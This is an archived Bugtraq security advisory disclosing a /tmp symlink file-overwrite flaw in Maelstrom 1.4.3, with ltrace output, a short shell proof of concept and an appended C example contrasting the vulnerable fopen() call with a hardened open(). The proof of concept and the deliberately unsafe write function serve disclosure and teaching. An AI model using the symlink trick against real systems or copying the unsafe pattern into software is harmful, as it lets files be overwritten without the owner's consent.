Bugtraq mailing list archives
Maelstrom 1.4.3 arbitrary file overwrite
From: "Andrew Griffiths" <andrewg () tasmail com>
Date: Sun, 20 Jan 2002 20:16:30 +1100 (EST)
Program: Maelstrom
Version: 1.4.3
Distribution: RedHat 7.1

When trying to break stuff, ltracing Maelstrom showed the following:

    fopen("/tmp/f", "w") = 0x08081f58
    fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
    fclose(0x08081f58) = 0

Which made me wonder if it followed symbolic links, by doing

    [andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla > /tmp/bla; \
    ln -s /tmp/bla f)

at which point I ran it again, and when I did cat /tmp/bla, I got

    Main program = Maelstrom

Conclusion:
-=-=-=-=-=-

You can overwrite arbitrary files with the permissions of the user who ran it. Of course, this won't work on systems that have linking restrictions in /tmp.

Fixing it
-=-=-=-=-

Remove the code that does the above.

--
www.tasmail.com
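Where a program does need to write such a file, the sketch below contrasts the fopen() pattern from the trace with an open() call that refuses pre-existing entries and symlinks. It is an added example, not code from the original post or from Maelstrom; the function names and the scratch directory are made up for illustration, and it builds its own constructed link/target pair inside a private directory.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Writes the line seen in the ltrace output, then closes the stream. */
static int emit(FILE *fp) {
    if (!fp) return -1;
    fprintf(fp, "Main program = %s\n", "Maelstrom");
    return fclose(fp);
}
/* Pattern from the trace: fopen(path, "w") follows a symlink at path. */
static int write_unsafe(const char *path) { return emit(fopen(path, "w")); }
/* Hardened: O_EXCL fails if any entry (symlink included) already exists at
 * path; O_NOFOLLOW refuses a symlink as the final path component. */
static int write_safe(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    FILE *fp = fd < 0 ? NULL : fdopen(fd, "w");
    if (!fp && fd >= 0) close(fd);
    return emit(fp);
}
/* Returns 1 if the first line of the file at path equals want. */
static int holds(const char *path, const char *want) {
    char buf[64] = "";
    FILE *fp = fopen(path, "r");
    if (fp) { if (!fgets(buf, sizeof buf, fp)) buf[0] = '\0'; fclose(fp); }
    return strcmp(buf, want) == 0;
}
/* Constructed scenario in a private scratch directory (made-up names).
 * Bit 0: write_safe refused the link and the target kept its content.
 * Bit 1: write_unsafe overwrote the target through the link. */
int symlink_demo(void) {
    char dir[] = "/tmp/symdemoXXXXXX", target[64], lnk[64];
    int result = 0;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/bla", dir);
    snprintf(lnk, sizeof lnk, "%s/f", dir);
    FILE *fp = fopen(target, "w");
    if (!fp || fputs("bla\n", fp) < 0 || fclose(fp) != 0) return -1;
    if (symlink(target, lnk) != 0) return -1;
    if (write_safe(lnk) != 0 && holds(target, "bla\n")) result |= 1;
    if (write_unsafe(lnk) == 0 && holds(target, "Main program = Maelstrom\n"))
        result |= 2;
    unlink(lnk); unlink(target); rmdir(dir);
    return result;
}
int main(void) { printf("symlink_demo() = %d\n", symlink_demo()); return 0; }
```

For a scratch file whose name does not matter, mkstemp() gives the same exclusive-create behaviour with an unpredictable name.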